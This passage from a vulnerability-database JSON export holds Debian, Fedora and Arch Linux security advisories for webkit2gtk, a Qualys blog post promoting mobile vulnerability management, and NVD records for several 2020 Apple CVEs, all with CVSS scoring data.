"impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9512"], "modified": "2016-01-21T00:00:00", "id": "USN-2879-1", "href": "https://ubuntu.com/security/notices/USN-2879-1", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "debian": [{"lastseen": "2023-11-29T10:24:49", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4724-1 security@debian.org\nhttps://www.debian.org/security/ Alberto Garcia\nJuly 15, 2020 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : webkit2gtk\nCVE ID : CVE-2020-9802 CVE-2020-9803 CVE-2020-9805 CVE-2020-9806\n CVE-2020-9807 CVE-2020-9843 CVE-2020-9850 CVE-2020-13753\n\nThe following vulnerabilities have been discovered in the webkit2gtk\nweb engine:\n\nCVE-2020-9802\n\n Samuel Gross discovered that processing maliciously crafted web\n content may lead to arbitrary code execution.\n\nCVE-2020-9803\n\n Wen Xu discovered that processing maliciously crafted web content\n may lead to arbitrary code execution.\n\nCVE-2020-9805\n\n An anonymous researcher discovered that processing maliciously\n crafted web content may lead to universal cross site scripting.\n\nCVE-2020-9806\n\n Wen Xu discovered that processing maliciously crafted web content\n may lead to arbitrary code execution.\n\nCVE-2020-9807\n\n Wen Xu discovered that processing maliciously crafted web content\n may lead to arbitrary code execution.\n\nCVE-2020-9843\n\n Ryan Pickren discovered that processing maliciously crafted web\n content may lead to a cross site scripting attack.\n\nCVE-2020-9850\n\n @jinmo123, @setuid0x0_, and @insu_yun_en discovered that a remote\n attacker may be able to cause arbitrary code execution.\n\nCVE-2020-13753\n\n Milan Crha discovered that an attacker may be able to execute\n commands outside the bubblewrap sandbox.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2.28.3-2~deb10u1.\n\nWe recommend that you upgrade your webkit2gtk packages.\n\nFor the detailed security status of webkit2gtk please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/webkit2gtk\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}}, "published": "2020-07-15T20:37:40", "type": "debian", "title": "[SECURITY] [DSA 4724-1] webkit2gtk security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13753", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850"], "modified": "2020-07-15T20:37:40", "id": "DEBIAN:DSA-4724-1:6BA8A", "href": "https://lists.debian.org/debian-security-announce/2020/msg00130.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2023-06-06T15:26:38", "description": "WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. This package contains WebKit2 based WebKitGTK for GTK 3. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-12T01:02:54", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: webkit2gtk3-2.28.3-1.fc32", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13753", "CVE-2020-9802", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850"], "modified": "2020-07-12T01:02:54", "id": "FEDORA:1B1A130A014E", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/JDBXQ2XA6X4DP4YTPXBOMKSLWUED2KAR/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T15:26:38", "description": "WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. This package contains WebKit2 based WebKitGTK for GTK 3. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-18T01:09:23", "type": "fedora", "title": "[SECURITY] Fedora 31 Update: webkit2gtk3-2.28.3-1.fc31", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13753", "CVE-2020-9802", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850"], "modified": "2020-07-18T01:09:23", "id": "FEDORA:C9F1930D42C8", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/GER2ATKZXDHM7FFYJH67ZPNZZX5VOUVM/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2023-11-28T16:45:10", "description": "Arch Linux Security Advisory ASA-202007-1\n=========================================\n\nSeverity: Critical\nDate : 2020-07-14\nCVE-ID : CVE-2020-9802 CVE-2020-9803 CVE-2020-9805 CVE-2020-9806\nCVE-2020-9807 CVE-2020-9843 CVE-2020-9850 CVE-2020-13753\nPackage : webkit2gtk\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1203\n\nSummary\n=======\n\nThe package webkit2gtk before version 2.28.3-1 is vulnerable to\nmultiple issues including arbitrary code execution, cross-site\nscripting and sandbox escape.\n\nResolution\n==========\n\nUpgrade to 2.28.3-1.\n\n# pacman -Syu \"webkit2gtk>=2.28.3-1\"\n\nThe problems have been fixed upstream in version 2.28.3.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2020-9802 (arbitrary code execution)\n\nA memory corruption issue has been found in WebKitGTK before 2.28.3 and\nWPE WebKit before 2.2.8.3, where processing maliciously crafted web\ncontent may lead to arbitrary code execution.\n\n- CVE-2020-9803 (arbitrary code execution)\n\nA memory corruption issue has been found in WebKitGTK before 2.28.3 and\nWPE WebKit before 2.2.8.3, where processing maliciously crafted web\ncontent may lead to arbitrary code execution.\n\n- CVE-2020-9805 (cross-site scripting)\n\nA logic issue has been found in WebKitGTK before 2.28.3 and WPE WebKit\nbefore 2.2.8.3, where processing maliciously crafted web content may\nlead to universal cross site scripting.\n\n- CVE-2020-9806 (arbitrary code execution)\n\nA memory corruption issue has been found in WebKitGTK before 2.28.3 and\nWPE WebKit before 2.2.8.3, where processing maliciously crafted web\ncontent may lead to arbitrary code execution.\n\n- CVE-2020-9807 (arbitrary code execution)\n\nA memory corruption issue has been found in WebKitGTK before 2.28.3 and\nWPE WebKit before 2.2.8.3, where processing maliciously crafted web\ncontent may lead to arbitrary code execution.\n\n- CVE-2020-9843 (cross-site scripting)\n\nAn issue has been found in WebKitGTK before 2.28.3 and WPE WebKit\nbefore 2.2.8.3, where processing maliciously crafted web content may\nlead to a cross site scripting attack.\n\n- CVE-2020-9850 (arbitrary code execution)\n\nA logic issue has been found in WebKitGTK before 2.28.3 and WPE WebKit\nbefore 2.2.8.3, allowing a remote attacker to execute arbitrary code.\n\n- CVE-2020-13753 (sandbox escape)\n\nThe bubblewrap sandbox of WebKitGTK and WPE WebKit, prior to 2.28.3,\nfailed to properly block access to CLONE_NEWUSER and the TIOCSTI ioctl.\nCLONE_NEWUSER could potentially be used to confuse xdg- desktop-portal,\nwhich allows access outside the sandbox. TIOCSTI can be used to\ndirectly execute commands outside the sandbox by writing to the\ncontrolling terminal\u2019s input buffer, similar to CVE-2017-5226.\n\nImpact\n======\n\nA remote attacker might be able to trigger cross-site scripting, bypass\nthe sandbox and execute arbitrary code on the affected host.\n\nReferences\n==========\n\nhttps://webkitgtk.org/security/WSA-2020-0006.html\nhttps://webkitgtk.org/security/WSA-2020-0006.html#CVE-2020-9802\nhttps://webkitgtk.org/security/WSA-2020-0006.html#CVE-2020-9803\nhttps://webkitgtk.org/security/WSA-2020-0006.html#CVE-2020-9805\nhttps://webkitgtk.org/security/WSA-2020-0006.html#CVE-2020-9806\nhttps://webkitgtk.org/security/WSA-2020-0006.html#CVE-2020-9807\nhttps://webkitgtk.org/security/WSA-2020-0006.html#CVE-2020-9843\nhttps://webkitgtk.org/security/WSA-2020-0006.html#CVE-2020-9850\nhttps://webkitgtk.org/security/WSA-2020-0006.html#CVE-2020-13753\nhttps://security.archlinux.org/CVE-2020-9802\nhttps://security.archlinux.org/CVE-2020-9803\nhttps://security.archlinux.org/CVE-2020-9805\nhttps://security.archlinux.org/CVE-2020-9806\nhttps://security.archlinux.org/CVE-2020-9807\nhttps://security.archlinux.org/CVE-2020-9843\nhttps://security.archlinux.org/CVE-2020-9850\nhttps://security.archlinux.org/CVE-2020-13753", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-14T00:00:00", "type": "archlinux", "title": "[ASA-202007-1] webkit2gtk: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5226", "CVE-2020-13753", "CVE-2020-9802", "CVE-2020-9803", "CVE-2020-9805", "CVE-2020-9806", "CVE-2020-9807", "CVE-2020-9843", "CVE-2020-9850"], "modified": "2020-07-14T00:00:00", "id": "ASA-202007-1", "href": "https://security.archlinux.org/ASA-202007-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2021-02-11T22:27:16", "description": "As mobile devices have become ubiquitous in almost every business process, whether in bank branches, manufacturing sites or retail stores, they are now hosting business applications and data that is subject to regulatory compliance and security. With access to critical corporate resources inside the corporate network, these mobile devices have become critical assets for the organization.\n\n### Mobile Attack Surface Challenges\n\nAlongside this trend, there has been a drastic rise in Android, iOS, and iPadOS vulnerabilities and an increased number of vulnerable apps distributed from authorized app stores. Through these vectors, mobile devices have become preferred targets for attackers to gain an entry point into corporate networks. Last year, for example, [900 million Apple iOS users were affected](<https://www.forbes.com/sites/gordonkelly/2020/05/13/apple-iphone-exploit-vulnerability-ios-13-mail-problem-update-iphone-11-pro-max-u-iphone-xs-max-xr-upgrade/?sh=45195bbc07b7>) by iOS mail app vulnerability CVE-2020-9819 and CVE-2020-9818 exploit. Zecops [demonstrated how to exploit](<https://blog.zecops.com/vulnerabilities/seeing-maildemons-technique-triggers-and-a-bounty/>) these vulnerabilities (MailDemon) by sending oversized email to victims\u2019 devices.\n\nIn another attack, Android mobile devices [were targeted](<https://www.zdnet.com/article/google-reveals-sophisticated-windows-android-hacking-operation/>) using the Google Chrome app vulnerability CVE-2020-6418, a type of bug that incorrectly implements relevant security checks. The attacker tricked victims into visiting a specially crafted web page that gave the attacker an initial foothold on the victim\u2019s device via their browser. The attacker then deployed OS-level vulnerability CVE-2019-2215 to gain privileged control of the victim\u2019s device including access to their data and the corporate network.\n\nIn both cases, the attacks were successful because the organizations were using a traditional vulnerability scanning approach for mobile devices. This approach fails to provide holistic security for mobile devices because it requires devices to connect to the VPN or the organization\u2019s network in order to be scanned for vulnerabilities or patched. Mobile Device Management (MDM) also fails in this case because its \u2018policy-based prevention\u2019 does not assess devices or the apps running on them for the latest vulnerabilities, and it lacks knowledge of the security posture of the device and does not provide flexible patching. \n\nOrganizations are looking for a solution which provides continuous visibility into mobile devices across the enterprise, continuous visibility into the vulnerability and misconfiguration posture of the device and apps, and a workflow for prioritized updates and patching.\n\n### Introducing Qualys VMDR for Mobile Devices\n\nBuilt on the FedRAMP-authorized [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>), [Qualys VMDR for Mobile Devices](<https://www.qualys.com/vmdr-mobile-devices>) extends vulnerability management, detection and response capabilities to mobile device platforms such as Android, iOS, and iPadOS. Qualys Cloud Agent for Android, iOS and iPadOS, available on Google Play Store and Apple App Store, provides continuous visibility, security and patch orchestration for your mobile platforms.\n\nTo learn more about this solution, watch the webinar on March 10: [Seamlessly Expand Vulnerability &amp; Patch Management to Enterprise Mobile Devices](<https://www.brighttalk.com/webcast/11673/469503>).\n\n#### Continuous Visibility and Monitoring of Mobile Devices Connecting to Your Network\n\nKnowing your mobile devices and monitoring their connections to your corporate network is fundamental to their security. With cloud agents deployed on your mobile devices, you get real-time visibility of all the mobile devices across your enterprise, including critical hardware and software details like firmware, OS, and installed applications details, along with location and the network information.\n\nThis mobile device inventory comes as a part of [Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) and [Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>).\n\nGain in-depth visibility into mobile devices across your enterprise\n\n#### Real-Time Visibility into Vulnerabilities and Critical Device Settings\n\nWith best-in-class vulnerability assessment for Android, iOS and iPadOS devices, Qualys VMDR for Mobile Devices enables:\n\n * Device vulnerability and exploit assessment covering vulnerabilities from 2016 to the latest for Android, iOS, and iPadOS providing insights into vulnerable OS versions with CVE details and detection of jailbroken/rooted devices,\n * Detection of critical device settings such as encryption disabled, password removed/disabled, Bluetooth settings, etc.,\n * Assessment of app vulnerability detections covering vulnerabilities from 2016 to the latest such as Google Chrome browser vulnerabilities, along with the detection of potentially harmful apps, and\n * Insights into network vulnerabilities and detection of devices connected to insecure or open Wi-Fi networks.\n\nQualys VMDR helps expand your vulnerability management program with configuration assessment by continuously monitoring the critical mobile device configurations as recommended by [National Security Agency (NSA) best practices](<https://www.nsa.gov/What-We-Do/Cybersecurity/Telework-and-Mobile-Security-Guidance/>), such as Bluetooth status, location services, app trusted status, and more.\n\nReal-time visibility into vulnerabilities Real-time visibility into critical settings\n\n#### Remote Response and Seamless Patch Orchestration\n\nTwo of the biggest response challenges in the mobile world are:\n\n * Performing remote actions when the mobile device is not on the VPN or network, i.e. when traditional vulnerability management approaches are not possible, and\n * Determining the appropriate mitigation action, which requires time-consuming research to map application updates to vulnerabilities and then either deploy those updates or uninstall the risky apps.\n\nQualys VMDR for Mobile Devices automatically and continuously correlates the vulnerabilities of Android apps available on Google Play Store with appropriate application updates, significantly decreasing your remediation response time. IT and remediation teams can schedule and deploy those patches from Google Play Store via seamless orchestration provided by VMDR or they can uninstall vulnerable apps.\n\nBased on the security posture of the device, security teams can take actions on all at-risk mobile devices simultaneously, even if the devices are not connected to the VPN or corporate network, leveraging over-the-air, out-of-the-box controls to reset in critical cases or lock devices, change passcodes, or even de-enroll the device.\n\nSeamless patch orchestration with tracking patch status Uninstall the vulnerable app Perform remote actions on the vulnerable devices\n\n#### Vulnerability Posture of Mobile Devices AND Servers in a Single Pane of Glass\n\nOne of the key metrics for vulnerability risk management teams and management is visualization of vulnerability and security posture across hybrid environments, from datacenter servers to endpoints to mobile devices. With mobile data flowing to the Qualys Cloud Platform via VMDR for Mobile Devices, your vulnerability and security teams can continuously inventory all your assets, including mobile devices, in a consolidated manner and gain insights into the vulnerability and misconfiguration posture of your servers and mobile devices in a single pane of glass.\n\nGain visibility into the security posture of different types of assets in a single pane of glass.\n\n### Visibility, Assessment, Correlation and Orchestration\n\nWith the growth of mobile devices, increasing attack surface and data exposure risks, security teams are looking for a solution which goes beyond traditional mobile vulnerability scanning tools. Qualys VMDR for Mobile Devices extends the power of vulnerability &amp; patch management to Android, iOS and iPadOS devices for: \n\n * Compressive visibility into mobile devices, installed apps, and configurations, even if they are not on VPN or network,\n * Continuous vulnerability and end-of-life assessment of devices, OSs, and applications along with monitoring for potential harmful applications,\n * Automatic correlation of vulnerabilities with apps and Android patches, and\n * Orchestration of appropriate response actions such as deploying patches from Google Play Store or uninstalling vulnerable apps.\n\n### Learn More\n\n * Webinar March 10: [Seamlessly Expand Vulnerability &amp; Patch Management to Enterprise Mobile Devices](<https://www.brighttalk.com/webcast/11673/469503>)\n * [Start your free trial](<https://www.qualys.com/try-vmdr-mobile-devices>)\n * [About VMDR for Mobile Devices](<https://www.qualys.com/apps/vulnerability-management-detection-response/mobile-devices>)\n * [User guide](<https://www.qualys.com/docs/qualys-sem-user-guide.pdf>)\n * [Qualys extends the power of VMDR to Android and iOS/iPadOS mobile devices](<https://www.qualys.com/company/newsroom/news-releases/usa/qualys-introduces-vmdr-for-mobile-devices>)", "cvss3": {}, "published": "2021-02-10T21:17:00", "type": "qualysblog", "title": "Expand Your Vulnerability & Patch Management Program to Mobile Devices with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-2215", "CVE-2020-6418", "CVE-2020-9818", "CVE-2020-9819"], "modified": "2021-02-10T21:17:00", "id": "QUALYSBLOG:65D9653A8189263EAD9C1C00AA7E205A", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-11-28T15:47:51", "description": "A denial of service issue was addressed with improved input validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A remote attacker may be able to cause a denial of service.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9827", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9827"], "modified": "2023-01-09T16:41:00", "cpe": [], "id": "CVE-2020-9827", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9827", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": []}, {"lastseen": "2023-11-28T15:48:23", "description": "A path handling issue was addressed with improved validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application may be able to overwrite arbitrary files.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2020-10-22T19:15:00", "type": "cve", "title": "CVE-2020-9994", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9994"], "modified": "2020-10-26T20:26:00", "cpe": [], "id": "CVE-2020-9994", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9994", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:55", "description": "A validation issue was addressed with improved input sanitization. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5. Processing a maliciously crafted text message may lead to application denial of service.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9829", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9829"], "modified": "2023-01-09T16:41:00", "cpe": [], "id": "CVE-2020-9829", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9829", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:45", "description": "An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing a maliciously crafted image may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9789", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9789"], "modified": "2023-01-09T16:41:00", "cpe": [], "id": "CVE-2020-9789", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9789", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:53", "description": "A race condition was addressed with improved state handling. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. An application may be able to gain elevated privileges.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9839", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9839"], "modified": "2023-01-09T16:41:00", "cpe": [], "id": "CVE-2020-9839", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9839", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-11-28T15:47:50", "description": "A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application may be able to execute arbitrary code with kernel privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "cve", "title": "CVE-2020-9821", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": 